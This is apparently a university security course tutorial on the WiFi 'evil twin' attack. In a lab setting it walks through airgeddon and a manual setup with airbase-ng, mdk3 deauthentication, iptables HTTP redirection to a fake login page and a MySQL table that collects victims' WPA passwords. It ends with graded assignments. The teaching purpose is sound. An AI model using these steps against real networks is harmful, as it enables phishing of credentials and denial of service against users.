WiFi "evil twin" attack

Authors: Mikhail Zolotukhin and Timo Hämäläinen

1. Introduction

Similar to the previous tutorial, this one should be completed by using real wireless devices. Once again you can try to use your virtual machines as described in the beginning of the previous tutorial, but we strongly recommend not to! As previously, in this tutorial, the attacker is supposed to have two network interfaces. Your wireless access point must support WPA encryption.

Similarly to the previous tutorial, the assignments (at least a major part of them) in this one can be completed without carrying out the attack described! You can just look through the tutorial and maybe find and watch a video of this attack performed by someone, no need to execute it yourself. Obviously it is recommended that you carry out the attack presented, so you have better understanding of the attack approach.

The remainder of this tutorial is organized as follows. Preliminary questions are listed in Section 2. Configuration of machines is presented in Section 3. The attack procedure is demonstrated in Section 4. Assignments are listed in Section 5. Section 6 concludes the tutorial.

This tutorial (including assignments) takes on average 6.24 hours to complete.

2. Preliminary questions

What is the evil twin attack in the context of WiFi security?
What are simple measures that you can take to protect yourself against this type of attack?
What are Airgeddon, Aircrack-ng, Iptables, and Mdk3?

3. Network configuration

Check the previous tutorial for the options. The only difference is this time we enable SSID broadcast for the sake of demonstration. The summary of the configuration is below:

3.1 Wireless access point

WiFi router with support of WPA-PSK.

SSID: dd-wrt
SSID broadcast: enabled
Wireless security mode: WPA Personal (WPA PSK), WPA2 should also work
WPA password: labra123

3.2 Attacker

We recommend to use a real machine as an attacker for this tutorial, and not virtual machine with WiFi USB adapter! The reason is that "evil" access point created in a virtual machine with WiFi dongle will be very unstable and you probably will not be able to complete the tutorial.

I did not manage to complete this tutorial without WiFi USB dongle. When using laptop's (Dell and Lenovo) wireless module, the evil access points is unstable and dissappears constantly.

In any case:

the attacker requires at least two network interfaces
at least one of these interfaces should be wireless

3.3 Client

Any modern device with WiFi module.

the client requires at least one real wireless network interface
the client should be connected to the wireless access point when doing the attack

4. Evil twin attack using Airgeddon

In this tutorial, we assume that the attacker has two network interfaces "eth0" and "wlan0". Interface "eth0" is used to connect the attacker to the Internet, whereas "wlan0" will be used to create an "evil twin" access point.

Install the packages required:

$ sudo apt update

$ sudo apt install airgeddon aircrack-ng hostapd isc-dhcp-server dnsmasq dsniff lighttpd

Start airgeddon:
```
$ sudo airgeddon
```
and press Enter to check that you have installed the software packages needed. Press Enter when the check is over.

Select a wireless interface, e.g. wlan0 by entering the corresponding number and pressing Enter.

Put the interface into monitor mode by entering "2", and then press Enter to continue.

Enter "7" to open Evil Twin attacks menu.

Select "9" for the attack with captive portal and then press Enter. After that, you should see a constantly updating list of WiFi networks scanned by your wireless interface. Find your network "dd-wrt" (the name can obviously be different in your case). Press Ctrl+C to stop the scan. Scan results will be available for selection. Enter the number corresponding to your network.

It is important that the device that you are using as a client should be connected to this network!

If you fail to see the scan results, there might be some problem with the Ctrl+C. Closing the monitor X client window did the trick for me.

— 05 Oct 23

Select "2" for death aireplay attack. Answer "n" to questions about DoS, MAC address spoofing and handshake file. For the timeout value select "100". Press Enter.

Kali will try to deauthenticate your client. You can help the client to connect to the target WiFi network after deathentication or simply enable auto-reconnect option. Both should work fine.

In the case of success a handshake will be captured. Enter a file path to save the handshake message, e.g. "/home/kali/handshake.cap".

After that, enter a file path to save the password in case a victim enters it in the future. For example, enter "/home/kali/passwords.txt".

Select the portal language. After that, press Enter to start the attack.

After some time, the client will disconnect from network "dd-wrt" and will not able to connect back. Unfortunately for the attacker, the client may not automatically connect to our "evil" access point either. When tested, my client device connected to the evil network automatically only once, but I could not repeat this result later. This can be explained by the fact that "evil twin" attack has been around for quite long time, and modern operating systems manage wireless connections properly. However, if our client desperately needs access to the Internet or simply does not pay attention, he/she may try to connect to unencrypted "dd-wrt". We simulate this scenario. On the client machine, connect to unencrypted network "dd-wrt".

On the victim device, open browser, you should automatically go to Hotspot Login page. Enter some password of the length which is equal or greater than eight symbols.

On the Kali machine where the attack is running, check the terminal in the top right, where you should see the last password entered.

5. Evil twin attack in "manual" mode

If for some reason you have skipped installation of DHCP server on the attacker in the previous section, istall it now using the following command in the terminal:
```
$ sudo apt install isc-dhcp-server -y
```

Open file with isc-dhcp-server configurations:

$ sudo nano /etc/dhcp/dhcpd.conf

find the following section:

# option definitions common to all supported networks...
option domain-name "example.org";
option domain-name-servers ns1.example.org, ns2.example.org;
default-lease-time 600;
max-lease-time 7200;

and comment all those lines using sign ”#”.

Find the following section in the file:

# A slightly different configuration for an internal subnet.
#subnet 10.5.5.0 netmask 255.255.255.224 {
# range 10.5.5.26 10.5.5.30;
# option domain-name-servers ns1.internal.example.org;
# option domain-name "internal.example.org";
# option subnet-mask 255.255.255.224;
# option routers 10.5.5.1;
# option broadcast-address 10.5.5.31;
# default-lease-time 600;
# max-lease-time 7200;
#}

uncomment these lines and put a real DNS server address, e.g. use Google's one. The result should look like the following:

# A slightly different configuration for an internal subnet.
subnet 10.5.5.0 netmask 255.255.255.224 {
range 10.5.5.26 10.5.5.30;
option domain-name-servers 8.8.8.8;
option subnet-mask 255.255.255.224;
option routers 10.5.5.1;
option broadcast-address 10.5.5.31;
default-lease-time 600;
max-lease-time 7200;
}

Do not forget to uncomment the last bracket "}". Save the changes.

Configure simple login page on the attacker. First, install apache2:
```
$ sudo apt install apache2 php8.1 php8.1-mysql
```
Remove index.html from directory /var/www/html:
```
$ sudo rm -rf /var/www/html/index.html
```
In case you complete this tutorial using the laptop in our lab, it makes sense to remove all files from that directory of the attacker:
```
$ sudo rm -rf /var/www/html/*
```
Download loginpage.zip:
```
$ wget http://student:Ties327_2023@users.jyu.fi/%7Emizolotu/teaching/files/loginpage.zip
```
Extract all files from the archive to "/var/www/html/":
```
$ sudo unzip loginpage.zip -d /var/www/html/
```
If you have problems with unzipping, reinstall unzip:
```
$ sudo apt purge unzip
```
```
$ sudo apt install unzip
```
Start Apache service:
```
$ sudo systemctl start apache2
```

Create simple database for storing passwords. First, install mysql server:
```
$ sudo apt install default-mysql-server
```
Next, start Mysql service:
```
$ sudo systemctl start mysql
```
Open MySQL:
```
$ sudo mysql -u root
```
and type:
```
create database wifipswd;
use wifipswd;
create table passwords(password varchar(64),confirm varchar(64));
```
Create new user "wifiuser" and grant all privileges on database "wifipswd" to this user:
```
create user 'wifiuser'@'localhost' identified by '';
grant all privileges on wifipswd.* to 'wifiuser'@'localhost';
```
Check carefully that you did not make any typo, or it will not work: the victim will not be abe to connect to the database. Do not quit Mysql at this point.

Open a new terminal on the attacker's machine and type
```
$ sudo airmon-ng
```
It will show you all wireless interfaces of your system, e.g. wlan0, wlan1, etc and their statuses. You should choose one of the interfaces which will be used for the attack. In this tutorial, the interface wlan0 is used.

Type
```
$ rfkill list
```
and check that wireless LAN is not blocked (in my case, it was hard blocked by default). If yes, unblock it by typing:
```
$ rfkill unblock wifi
```
Otherwise, just skip this step.

Start the interface wlan0 in monitor mode:
```
$ sudo airmon-ng start wlan0
```
In the case of success, you should see that monitor mode is enabled on "wlan0" (the name can be different, the exact name can be found in line "monitor mode vif enabled for wlan0 on wlan0").

Using the interface "wlan0" (the name can be different in your case) start monitoring available wireless networks by typing:
```
$ sudo airodump-ng wlan0
```
If you have the following error:
```
Device or resource busy
```
try to kill network-manager by typing
```
$ sudo kill -9 PID
```
where PID is network-manager process ID, or just use:
```
$ sudo airmon-ng check kill
```

In the case of success, you will see the list of available wireless networks. Find the network corresponding to the WiFi router you have configured:
- Its BSSID must be equal to the MAC address of the router
- Encryption mode is WPA
- ESSID is "dd-wrt".
Please make sure that you pick the network corresponding to your router, but not the one belonging to your neighbor! :) Once you have found the target network, check also what channel it uses. All this information is needed to perform the attack. Hit CTRL+C to cancel the running airodump.

Start "evil" access point on the attacker:
```
$ sudo airbase-ng -e dd-wrt -c 6 wlan0
```
Where "wlan0" is the attacker's network interface working in the monitor mode, "6" is the channel number, and "dd-wrt" is the name of our "evil" access point. In our case, we want to make it look similar to the legitimate access point, but you can use another name to distinguish the evil access point from the legitimate one, e.g. "dd-wrt-evil". Notice that the access point starts using new interface "at0" (in your case, the name can be different). At this point, it makes sense to check what WiFi networks can be seen from the client. If your "evil" access point started correctly the client should see two wireless networks named "dd-wrt": protected one that corresponds to our legitimate access point and open one that corresponds to the attacker.

Open the third terminal on the attacker and create file "at0.cfg" to make some configurations for our new interface "at0":

$ nano at0.cfg

Insert following lines to this new file (letter case is important here):

ifconfig at0 10.5.5.1 netmask 255.255.255.224
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -F
iptables -t nat -F
iptables -A FORWARD -i at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.5.5.1:80
iptables -t nat -A POSTROUTING -j MASQUERADE

save and exit.

Install iptables (if it is not installed):
```
$ sudo apt install iptables
```
Execute our configuration file:
```
$ sudo bash at0.cfg
```

Now we have to complete the DHCP server configuration. Create empty lease database file:
```
$ sudo touch /var/lib/dhcp/dhcpd.leases
```
Open isc-dhcp-server default configuration file:
```
$ sudo nano /etc/default/isc-dhcp-server
```
find
```
INTERFACESv4=""
```
and modify this line by inserting the evil access point interface:
```
INTERFACESv4="at0"
```

Only after that, start the DHCP service:
```
$ sudo systemctl start isc-dhcp-server
```
In case of success, you will not see any errors or warnings. You can check status of the DHCP service by running in terminal:
```
$ sudo systemctl status isc-dhcp-server
```
It should include green text "active (running)". If you have red "failed", you most likely missed something in the previous steps. In this case, make sure that the evil access point created by "airbase-ng" is still running, also double-check content of file "at0.cfg" for typos. If you find and correct your typos, you have to run the file with at0 and iptables configurations again, and then restart isc-dhcp-server:
```
$ sudo bash at0.cfg
$ sudo systemctl restart isc-dhcp-server
```
In case of some very complicated misconfigurations, the DHCP server may be in half-active and half-failed state, in this case you cannot even restart it properly. In this case, try to remove .pid file corresponding to the DHCP server from "/var/run" directory.

Run de-authentication attack against legitimate "dd-wrt" (we assume here that our client is still connected to the legitimate network). For this purpose, create file ”blacklist” and add BSSID of our legitimate access point to it by typing in the terminal:
```
$ echo 58:6D:8F:6B:28:81 > blacklist
```
where "58:6D:8F:6B:28:81" is our legitimate access point's (router's) BSSID. In your case, it will obviously be different.

Install mdk3:
```
$ sudo apt install mdk3
```
and run it as follows:
```
$ sudo mdk3 wlan0 d -b blacklist -c 6
```
where "wlan0" is our interface working in the monitor mode, and "6" is the channel number of "dd-wrt".

After some time, our client will disconnect from network "dd-wrt" and will not able to connect back. As previously, the client will most likely not connect to our "evil" access point automatically (at least it should not). Since "evil twin" attack has been around for quite long time, modern operating systems manage wireless connections properly. However, if our client desperately needs access to the Internet, it may risk and try to connect to unencrypted "dd-wrt". We simulate this scenario. On the client machine, connect to unencrypted network "dd-wrt".

The attack works fine against Android devices, Linux and Windows laptops. However, sometimes there can be difficulties with some Windows 10 laptops that are probably caused by wireless network drivers used, since those successfully connect to the evil twin via USB WiFi dongle.

You can try to access the evil access point from different clients. If it does not work from any in your case, just skip the next two steps and go straight to the assignments.

In case of success, the client now has access to the Internet. Open browser on the client, and go to some website, e.g. "www.bbc.com" or "http://email.jyu.fi". Be patient, it will work as if you are using 56k modem. Since we configured iptables in such a way that traffic to port 80 (http) will be redirected to the attacker's web page, in order to demonstrate attack, the client must use HTTP protocol, not HTTPS. If you configured everything correctly, the client will be redirected to the login page of the attacker. If the client is dumb enough, he/she will enter and confirm his/her WPA password. We simulate this worst case scenario: enter and confirm your password (labra123).

Please add a comment below if you were able to carry out the attack in the manual mode, i.e. the client connected to the evil AP and was redirected to the captive portal

Edit: looks like it does not work in the manual mode anymore... :(

— 06 Oct 23 (edited 21 Oct 23)

Go back to the attacker's terminal, where Mysql is running. Type in Mysql terminal:
```
use wifipswd;
select * from passwords;
```
In the case of success, the WPA password entered by the client will be shown.

6. Assignment (5p.)

6.1 Preliminary

Complete the test below based on the preliminary questions and tools used in the tutorial (1 point).

# eviltwin_basic1

# eviltwin_basic2

6.2 Basic

Complete the test below based on the tutorial results (0.5 points):

# eviltwin_basic3

# eviltwin_basic4

# eviltwin_basic5

# eviltwin_basic6

# eviltwin_basic7

Check the commands in file "at0.cfg" that we used to configure the evil access point during the attack in "manual" mode. Below is that list of commands duplicated but with indexes for convenience' sake:

ifconfig at0 10.5.5.1 netmask 255.255.255.224
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -F
iptables -t nat -F
iptables -A FORWARD -i at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.5.5.1:80
iptables -t nat -A POSTROUTING -j MASQUERADE

Find information in the Internet for what each of the commands is used and answer the questions below (0.5 points).

# eviltwin_basic8

# eviltwin_basic9

# eviltwin_basic10

# eviltwin_basic11

# eviltwin_basic12

Read article "A Passive Client-based Approach to Detect Evil Twin Attacks" and complete the test below based on the paper results.

# eviltwin_basic13

6.3 Advanced

Using Mdk3 perform two following DoS attacks against the access point and the client:

Beacon flooding
Authentication flooding

Enter the commands used into the corresponding answer boxes below.

The command for beacon flooding (0.5 points):

# eviltwin_advanced1

The command for authentication flooding (0.5 points):

# eviltwin_advanced2

In the basic assignment, we have got familiar with one evil twin detection approach which relies on the assumption that the evil AP forwards traffic from/to the legitimate AP and therefore there are highly correlated traffic patterns that can be detected. However, what if the evil AP is connected directly to the backbone network e.g. via an independent cellular connection?

Read article "Hacker’s Toolbox: Detecting Software-Based 802.11 Evil Twin Access Points" that partially addresses this problem by focusing on detection of software-based evil twin attacks. Complete the test below based on the paper results.

# eviltwin_advanced3

6.4 General comments and feedback

Let us know how many hours in total have you spent on this assignment:

# eviltwin_time

On a scale from 1 to 10, estimate how interesting and difficult was the tutorial:

# eviltwin_interest

# eviltwin_difficulty

You can also give us some general feedback:

# eviltwin_feedback

7. Conclusion

The attack presented in this tutorial is not classical "evil twin" attack, in which the client automatically connects to the "evil" access point after being forced to disconnect from the legitimate one. In our case, the attack is rather a phishing attempt combined with some simple DoS attack against the legitimate access point. This attack might easily take place in public places, such as big hotels or airports, where several access points have the same name, and when a client cannot connect to a legitimate access point, he might try to connect to the ”evil” one without paying attention to the fact that it is unencrypted. In this tutorial, the attack is performed by using such applications as Aircrack, Mdk3 and Iptables.

More information on the topic can be found at: